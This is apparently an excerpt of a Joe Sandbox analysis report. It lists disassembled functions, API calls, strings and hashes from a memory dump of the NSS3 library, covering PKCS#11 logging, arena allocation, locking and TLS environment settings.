Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *phKey = 0x%x$ hSession = 0x%x$ pMechanism = 0x%p$ pTemplate = 0x%p$ phKey = 0x%p$ ulCount = %d$ (CK_INVALID_HANDLE)$C_GenerateKey
API String ID: 1003633598-2039122979
Opcode ID: d0975427d29dc814299a3a94257d2f7968676fc30a52ccbf04927ecb16718987
Instruction ID: ca98d0770b0bd04f042a7b6c6ae99bfbf00884f3ee630f9f01e3ffc8b4916bc7
Opcode Fuzzy Hash: d0975427d29dc814299a3a94257d2f7968676fc30a52ccbf04927ecb16718987
Instruction Fuzzy Hash: 54519030602154ABDB20DF98DE8CFAA7775AB4631CF048576E8056BB12D734BC1ACBD2

Function 6C78AB90 Relevance: 33.4, APIs: 22, Instructions: 388COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C78ABCB
EnterCriticalSection.KERNEL32 ref: 6C78ABE4
TlsGetValue.KERNEL32 ref: 6C78AC0B
PR_Unlock.NSS3 ref: 6C78AC7B
TlsGetValue.KERNEL32 ref: 6C78AC9C
EnterCriticalSection.KERNEL32 ref: 6C78ACB5
PR_WaitCondVar.NSS3 ref: 6C78ACD5
TlsGetValue.KERNEL32 ref: 6C78ACF4

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Value$CriticalEnterSection$CondUnlockWait
String ID:
API String ID: 839227765-0
Opcode ID: d20d45a3f804d3440e250fb696e8391b589c3fc9a17db611a61d3c0a539ab4f3
Instruction ID: 6b8e69b9ab6764754907ca345eaa170401a49321b733852f42f9df4b100af94d
Opcode Fuzzy Hash: d20d45a3f804d3440e250fb696e8391b589c3fc9a17db611a61d3c0a539ab4f3
Instruction Fuzzy Hash: 34F17E74A06751CFDB209F79C688759BBF0BF06318F008979DA9987B51EB34E884CB91

Function 6C7B2D80 Relevance: 33.4, APIs: 22, Instructions: 381COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,?,?,00000000,?), ref: 6C7B2DEC
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,?), ref: 6C7B2E00
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C7B2E2B
PR_SetError.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C7B2E43
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,6C784F1C,?,-00000001,00000000,?), ref: 6C7B2E74
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,?,6C784F1C,?,-00000001,00000000), ref: 6C7B2E88
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C7B2EC6
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C7B2EE4
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C7B2EF8
PR_Unlock.NSS3(?), ref: 6C7B2F62
TlsGetValue.KERNEL32 ref: 6C7B2F86
EnterCriticalSection.KERNEL32(0000001C), ref: 6C7B2F9E
PR_Unlock.NSS3(?), ref: 6C7B2FCA
TlsGetValue.KERNEL32 ref: 6C7B301A
EnterCriticalSection.KERNEL32(?), ref: 6C7B302E
PR_Unlock.NSS3(?), ref: 6C7B3066
PR_SetError.NSS3(00000000,00000000), ref: 6C7B3085
PR_Unlock.NSS3(?), ref: 6C7B30EC
TlsGetValue.KERNEL32 ref: 6C7B310C
EnterCriticalSection.KERNEL32(0000001C), ref: 6C7B3124
PR_Unlock.NSS3(?), ref: 6C7B314C

Part of subcall function 6C799180: PK11_NeedUserInit.NSS3(?,?,?,00000000,00000001,6C7C379E,?,6C799568,00000000,?,6C7C379E,?,00000001,?), ref: 6C79918D
Part of subcall function 6C799180: PR_SetError.NSS3(FFFFE000,00000000,?,?,?,00000000,00000001,6C7C379E,?,6C799568,00000000,?,6C7C379E,?,00000001,?), ref: 6C7991A0

Part of subcall function 6C7607A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C6F204A), ref: 6C7607AD
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6F204A), ref: 6C7607CD
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6F204A), ref: 6C7607D6
Part of subcall function 6C7607A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C6F204A), ref: 6C7607E4
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,6C6F204A), ref: 6C760864
Part of subcall function 6C7607A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C760880
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,?,6C6F204A), ref: 6C7608CB
Part of subcall function 6C7607A0: TlsGetValue.KERNEL32(?,?,6C6F204A), ref: 6C7608D7
Part of subcall function 6C7607A0: TlsGetValue.KERNEL32(?,?,6C6F204A), ref: 6C7608FB

PR_SetError.NSS3(00000000,00000000), ref: 6C7B316D

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Value$Unlock$CriticalEnterSection$Error$calloc$InitK11_NeedUser
String ID:
API String ID: 3383223490-0
Opcode ID: 8104c93c1cf2ba66d2af22fd7740f98f4d354cb5b0ae21e273bd5d6050997c1b
Instruction ID: b591ae05f0b4577022efdb5a90a887cdc141243c1516ac9588765464985c27bb
Opcode Fuzzy Hash: 8104c93c1cf2ba66d2af22fd7740f98f4d354cb5b0ae21e273bd5d6050997c1b
Instruction Fuzzy Hash: EDF1AEB5D00609AFDF11DF68D988B99BBB8BF09318F144179EC04A7B11EB31E995CB81

Function 6C7AAB10 Relevance: 33.4, APIs: 10, Strings: 9, Instructions: 127COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DecryptMessageNext), ref: 6C7AAB36
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C7AAB64
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C7AAB73

Part of subcall function 6C88D930: PL_strncpyz.NSS3(?,?,?), ref: 6C88D963

PR_LogPrint.NSS3(?,00000000), ref: 6C7AAB89
PR_LogPrint.NSS3( pParameter = 0x%p,?), ref: 6C7AABAB
PR_LogPrint.NSS3( ulParameterLen = 0x%p,?), ref: 6C7AABC6
PR_LogPrint.NSS3( pCiphertextPart = 0x%p,?), ref: 6C7AABE1
PR_LogPrint.NSS3( ulCiphertextPartLen = %d,?), ref: 6C7AABFC
PR_LogPrint.NSS3( pPlaintextPart = 0x%p,?), ref: 6C7AAC17
PR_LogPrint.NSS3( pulPlaintextPartLen = 0x%p,?), ref: 6C7AAC30

Strings

ulParameterLen = 0x%p, xrefs: 6C7AABC1
pPlaintextPart = 0x%p, xrefs: 6C7AAC12
pParameter = 0x%p, xrefs: 6C7AABA6
pCiphertextPart = 0x%p, xrefs: 6C7AABDC
pulPlaintextPartLen = 0x%p, xrefs: 6C7AAC2B
(CK_INVALID_HANDLE), xrefs: 6C7AAB6C
ulCiphertextPartLen = %d, xrefs: 6C7AABF7
C_DecryptMessageNext, xrefs: 6C7AAB31
hSession = 0x%x, xrefs: 6C7AAB4E, 6C7AAB5E

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pCiphertextPart = 0x%p$ pParameter = 0x%p$ pPlaintextPart = 0x%p$ pulPlaintextPartLen = 0x%p$ ulCiphertextPartLen = %d$ ulParameterLen = 0x%p$ (CK_INVALID_HANDLE)$C_DecryptMessageNext
API String ID: 1003633598-206538543
Opcode ID: 68e48badfe005263a01dc1b69f68fd8be571364672795be882c224ad2e6f0c8c
Instruction ID: c6f64fd5c10bdc0c1bb97e729765946902c05d84686a3dd1ba22f0383d966901
Opcode Fuzzy Hash: 68e48badfe005263a01dc1b69f68fd8be571364672795be882c224ad2e6f0c8c
Instruction Fuzzy Hash: 1D41E435602118BFDF208F98DF4CE9977B2AB4632DF048475F80867A22D735AD19DB91

Function 6C7AAF20 Relevance: 33.4, APIs: 10, Strings: 9, Instructions: 126COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_SignMessage), ref: 6C7AAF46
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C7AAF74
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C7AAF83

Part of subcall function 6C88D930: PL_strncpyz.NSS3(?,?,?), ref: 6C88D963

PR_LogPrint.NSS3(?,00000000), ref: 6C7AAF99
PR_LogPrint.NSS3( pParameter = 0x%p,?), ref: 6C7AAFBE
PR_LogPrint.NSS3( ulParameterLen = 0x%p,?), ref: 6C7AAFD9
PR_LogPrint.NSS3( pData = 0x%p,?), ref: 6C7AAFF4
PR_LogPrint.NSS3( ulDataLen = %d,?), ref: 6C7AB00F
PR_LogPrint.NSS3( pSignature = 0x%p,?), ref: 6C7AB028
PR_LogPrint.NSS3( pulSignatureLen = 0x%p,?), ref: 6C7AB041

Strings

ulParameterLen = 0x%p, xrefs: 6C7AAFD4
pParameter = 0x%p, xrefs: 6C7AAFB9
pSignature = 0x%p, xrefs: 6C7AB023
pData = 0x%p, xrefs: 6C7AAFEF
ulDataLen = %d, xrefs: 6C7AB00A
(CK_INVALID_HANDLE), xrefs: 6C7AAF7C
C_SignMessage, xrefs: 6C7AAF41
pulSignatureLen = 0x%p, xrefs: 6C7AB03C
hSession = 0x%x, xrefs: 6C7AAF5E, 6C7AAF6E

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pData = 0x%p$ pParameter = 0x%p$ pSignature = 0x%p$ pulSignatureLen = 0x%p$ ulDataLen = %d$ ulParameterLen = 0x%p$ (CK_INVALID_HANDLE)$C_SignMessage
API String ID: 1003633598-1612141141
Opcode ID: 1ca4dced24910019585517135164bf94380cf118aae457a89665ec257ac73513
Instruction ID: 34a1641d400dae5ce9b8c2da7217bf5c3d490182b51da7b3857cd1c6f5171dc5
Opcode Fuzzy Hash: 1ca4dced24910019585517135164bf94380cf118aae457a89665ec257ac73513
Instruction Fuzzy Hash: BB41D235602058AFDB308F98DF4CE9A7BB1AB4631DF088475E80867B12D734B819DBE1

Function 6C7DC980 Relevance: 33.3, APIs: 22, Instructions: 298memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000400,6C7DAEB0,?,00000004,00000001,?,00000000,?,?), ref: 6C7DC98E

Part of subcall function 6C7D0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C7787ED,00000800,6C76EF74,00000000), ref: 6C7D1000
Part of subcall function 6C7D0FF0: PR_NewLock.NSS3(?,00000800,6C76EF74,00000000), ref: 6C7D1016
Part of subcall function 6C7D0FF0: PL_InitArenaPool.NSS3(00000000,security,6C7787ED,00000008,?,00000800,6C76EF74,00000000), ref: 6C7D102B

PORT_ArenaAlloc_Util.NSS3(00000000,00000028,?,6C7DAEB0,?,00000004,00000001,?,00000000,?,?), ref: 6C7DC9A1

Part of subcall function 6C7D10C0: TlsGetValue.KERNEL32(?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D10F3
Part of subcall function 6C7D10C0: EnterCriticalSection.KERNEL32(?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D110C
Part of subcall function 6C7D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D1141
Part of subcall function 6C7D10C0: PR_Unlock.NSS3(?,?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D1182
Part of subcall function 6C7D10C0: TlsGetValue.KERNEL32(?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D119C

SECOID_FindOIDByTag_Util.NSS3(0000001A,?,?,?,6C7DAEB0,?,00000004,00000001,?,00000000,?,?), ref: 6C7DC9D3

Part of subcall function 6C7D0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7D08B4

SECITEM_CopyItem_Util.NSS3(00000000,-00000018,00000000,?,?,?,?,6C7DAEB0,?,00000004,00000001,?,00000000,?,?), ref: 6C7DC9E6

Part of subcall function 6C7CFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C7C8D2D,?,00000000,?), ref: 6C7CFB85
Part of subcall function 6C7CFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C7CFBB1

PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,6C7DAEB0,?,00000004,00000001,?,00000000,?,?), ref: 6C7DC9F5
PORT_ArenaAlloc_Util.NSS3(00000000,00000050,?,?,?,?,?,?,?,6C7DAEB0,?,00000004,00000001,?,00000000,?), ref: 6C7DCA0A
SEC_ASN1EncodeInteger_Util.NSS3(00000000,00000000,00000001,?,?,?,?,?,?,?,?,?,6C7DAEB0,?,00000004,00000001), ref: 6C7DCA33
SECOID_FindOIDByTag_Util.NSS3(00000019,?,?,?,?,?,?,?,?,?,?,?,?,6C7DAEB0,?,00000004), ref: 6C7DCA4D
SECITEM_CopyItem_Util.NSS3(00000001,?,00000000), ref: 6C7DCA60
SEC_PKCS7DestroyContentInfo.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,6C7DAEB0,?,00000004), ref: 6C7DCA6D
PR_Now.NSS3 ref: 6C7DCAD6
PORT_ArenaMark_Util.NSS3(00000000), ref: 6C7DCB23
PORT_ArenaAlloc_Util.NSS3(00000000,0000005C), ref: 6C7DCB32
SEC_ASN1EncodeInteger_Util.NSS3(00000000,00000000,00000001), ref: 6C7DCB64
SECOID_SetAlgorithmID_Util.NSS3(00000000,?,00000001,00000000), ref: 6C7DCBBB
PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6C7DCBD0
PORT_ArenaAlloc_Util.NSS3(00000000,00000018), ref: 6C7DCBF6
PORT_ArenaAlloc_Util.NSS3(00000000,00000008), ref: 6C7DCC18
SECOID_SetAlgorithmID_Util.NSS3(00000000,00000000,00000001,00000000), ref: 6C7DCC39
PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C7DCC5B

Part of subcall function 6C7D10C0: PL_ArenaAllocate.NSS3(?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D116E

PORT_ArenaAlloc_Util.NSS3(00000000,00000008), ref: 6C7DCC69
SECITEM_CopyItem_Util.NSS3(00000000,?,00000000), ref: 6C7DCC89

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$Arena$Alloc_$CopyItem_$AlgorithmAllocateArena_EncodeFindInteger_Tag_Value$ContentCriticalDestroyEnterErrorFreeInfoInitLockMark_PoolSectionUnlockcallocmemcpy
String ID:
API String ID: 1766420342-0
Opcode ID: 97695746faa23edfac5f051cba6995681151a43cec4bca7be9a7c64652152555
Instruction ID: 03df0ca8eb507e306e25613f82c83ce468df4819ea34255df8a9635d05674cb6
Opcode Fuzzy Hash: 97695746faa23edfac5f051cba6995681151a43cec4bca7be9a7c64652152555
Instruction Fuzzy Hash: 10B1E3B5E003069FEB00DF64DE44BAA7BB5BF18309F124135E908A7751EB71E994CBA1

Function 6C7B29A0 Relevance: 31.8, APIs: 15, Strings: 3, Instructions: 292COMMON

Download Yara Rule

APIs

PK11_ImportPublicKey.NSS3(00000000,?,00000000,?,?,?,?,?,^jxl,00000001,00000000,?,6C786540,?,0000000D,00000000), ref: 6C7B2A39
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,^jxl,00000001,00000000,?,6C786540,?,0000000D,00000000), ref: 6C7B2A5B
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,^jxl,00000001,00000000,?,6C786540,?,0000000D), ref: 6C7B2A6F
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,^jxl,00000001), ref: 6C7B2AAD
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,^jxl,00000001,00000000), ref: 6C7B2ACB
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,^jxl,00000001), ref: 6C7B2ADF
PR_Unlock.NSS3(?), ref: 6C7B2B38
PR_Unlock.NSS3(?), ref: 6C7B2B8B

Part of subcall function 6C7607A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C6F204A), ref: 6C7607AD
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6F204A), ref: 6C7607CD
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6F204A), ref: 6C7607D6
Part of subcall function 6C7607A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C6F204A), ref: 6C7607E4
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,6C6F204A), ref: 6C760864
Part of subcall function 6C7607A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C760880
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,?,6C6F204A), ref: 6C7608CB
Part of subcall function 6C7607A0: TlsGetValue.KERNEL32(?,?,6C6F204A), ref: 6C7608D7
Part of subcall function 6C7607A0: TlsGetValue.KERNEL32(?,?,6C6F204A), ref: 6C7608FB

PR_SetError.NSS3(FFFFE040,00000000,?,?,?,?,?,^jxl,00000001,00000000,?,6C786540,?,0000000D,00000000,?), ref: 6C7B2CA2

Strings

@exl, xrefs: 6C7B29E7, 6C7B2A1D
@exl, xrefs: 6C7B2A18, 6C7B2A22
^jxl, xrefs: 6C7B29A5

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Value$Unlock$CriticalEnterSectioncalloc$ErrorImportK11_Public
String ID: @exl$@exl$^jxl
API String ID: 2580468248-2734238399
Opcode ID: 51a122f174e8f09a3a02d9cd3910be82c4c15bfc7873489321008d7cf85a23a4
Instruction ID: b815bed60c1ec026fd42465bca061c37417637eaa384b0fbdbd89c7ff34f5ef0
Opcode Fuzzy Hash: 51a122f174e8f09a3a02d9cd3910be82c4c15bfc7873489321008d7cf85a23a4
Instruction Fuzzy Hash: 56B1BC75D012059FDB21DF68DA88B9AB7B4FF49308F148939EC05A7A12EB31E940CB91

Function 6C7B4C20 Relevance: 30.3, APIs: 20, Instructions: 290memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C7B4C4C
EnterCriticalSection.KERNEL32(?), ref: 6C7B4C60
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C7B4CA1
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6C7B4CBE
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6C7B4CD2
realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7B4D3A
PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7B4D4F
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C7B4DB7

Part of subcall function 6C81DD70: TlsGetValue.KERNEL32 ref: 6C81DD8C
Part of subcall function 6C81DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C81DDB4

Part of subcall function 6C7607A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C6F204A), ref: 6C7607AD
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6F204A), ref: 6C7607CD
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6F204A), ref: 6C7607D6
Part of subcall function 6C7607A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C6F204A), ref: 6C7607E4
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,6C6F204A), ref: 6C760864
Part of subcall function 6C7607A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C760880
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,?,6C6F204A), ref: 6C7608CB
Part of subcall function 6C7607A0: TlsGetValue.KERNEL32(?,?,6C6F204A), ref: 6C7608D7
Part of subcall function 6C7607A0: TlsGetValue.KERNEL32(?,?,6C6F204A), ref: 6C7608FB

TlsGetValue.KERNEL32 ref: 6C7B4DD7
EnterCriticalSection.KERNEL32(?), ref: 6C7B4DEC
PR_Unlock.NSS3(?), ref: 6C7B4E1B
PR_SetError.NSS3(00000000,00000000), ref: 6C7B4E2F
PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7B4E5A
PR_SetError.NSS3(00000000,00000000), ref: 6C7B4E71
free.MOZGLUE(00000000), ref: 6C7B4E7A
PR_Unlock.NSS3(?), ref: 6C7B4EA2
TlsGetValue.KERNEL32 ref: 6C7B4EC1
EnterCriticalSection.KERNEL32(?), ref: 6C7B4ED6
PR_Unlock.NSS3(?), ref: 6C7B4F01
free.MOZGLUE(00000000), ref: 6C7B4F2A

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Value$CriticalSectionUnlock$Enter$Error$callocfree$Alloc_LeaveUtilrealloc
String ID:
API String ID: 759471828-0
Opcode ID: 727d5017a638ecbcd4dc0aa8c2e5125a54fd124a8c102f563fc562ac0f20192d
Instruction ID: ec8c7df82bcf2f38596656dbe0212dcb29dc24278eb7d74379cc5a056d0e82e0
Opcode Fuzzy Hash: 727d5017a638ecbcd4dc0aa8c2e5125a54fd124a8c102f563fc562ac0f20192d
Instruction Fuzzy Hash: 75B1D075A00206AFDB11EF68D985BAA77B8BF4531CF044138ED15A7B01EB34EA64CBD1

Function 6C806E90 Relevance: 30.1, APIs: 11, Strings: 6, Instructions: 305fileCOMMON

Download Yara Rule

APIs

PR_GetEnvSecure.NSS3(SSLKEYLOGFILE,?,6C806BF7), ref: 6C806EB6

Part of subcall function 6C761240: TlsGetValue.KERNEL32(00000040,?,6C76116C,NSPR_LOG_MODULES), ref: 6C761267
Part of subcall function 6C761240: EnterCriticalSection.KERNEL32(?,?,?,6C76116C,NSPR_LOG_MODULES), ref: 6C76127C
Part of subcall function 6C761240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C76116C,NSPR_LOG_MODULES), ref: 6C761291
Part of subcall function 6C761240: PR_Unlock.NSS3(?,?,?,?,6C76116C,NSPR_LOG_MODULES), ref: 6C7612A0

fopen.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,6C8AFC0A,6C806BF7), ref: 6C806ECD
ftell.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C806EE0
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(# SSL/TLS secrets log file, generated by NSS,0000002D,00000001), ref: 6C806EFC
PR_NewLock.NSS3 ref: 6C806F04
fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C806F18
PR_GetEnvSecure.NSS3(SSLFORCELOCKS,6C806BF7), ref: 6C806F30
PR_GetEnvSecure.NSS3(NSS_SSL_ENABLE_RENEGOTIATION,?,6C806BF7), ref: 6C806F54
PR_GetEnvSecure.NSS3(NSS_SSL_REQUIRE_SAFE_NEGOTIATION,?,?,6C806BF7), ref: 6C806FE0
PR_GetEnvSecure.NSS3(NSS_SSL_CBC_RANDOM_IV,?,?,?,6C806BF7), ref: 6C806FFD

Strings

